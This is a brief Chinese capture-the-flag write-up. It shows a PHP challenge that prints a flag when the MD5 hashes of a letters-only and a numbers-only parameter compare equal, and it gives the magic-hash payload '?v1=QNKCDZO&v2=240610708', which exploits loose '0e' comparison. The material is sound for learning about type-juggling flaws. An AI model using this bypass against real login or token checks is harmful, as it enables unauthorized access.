在线base64解码的到源码
<?php
include('flag.php');
highlight_file('index.php');
$v1=$_GET['v1'];
$v2=$_GET['v2'];
if(isset($v1) && isset($v2)){
if(!ctype_alpha($v1)){
die("v1 error");
}
if(!is_numeric($v2)){
die("v2 error");
}
if(md5($v1)==md5($v2)){
echo $flag;
}
}else{
echo "where is flag?";
}
?>
ctype_alpha 是 PHP 中的一个字符类型(CType)函数,用于检查一个字符串是否仅包含字母字符。
is_numeric 是 PHP 中的一个内置函数,用于检测变量是否为数字或数字字符串。
所以v1字能是字母,v2只能是数字
- QNKCDZO
- 240610708
这两个的md5值都是 0e 开头,在 php 弱类型比较中判断为相等
pyload:?v1=QNKCDZO&v2=240610708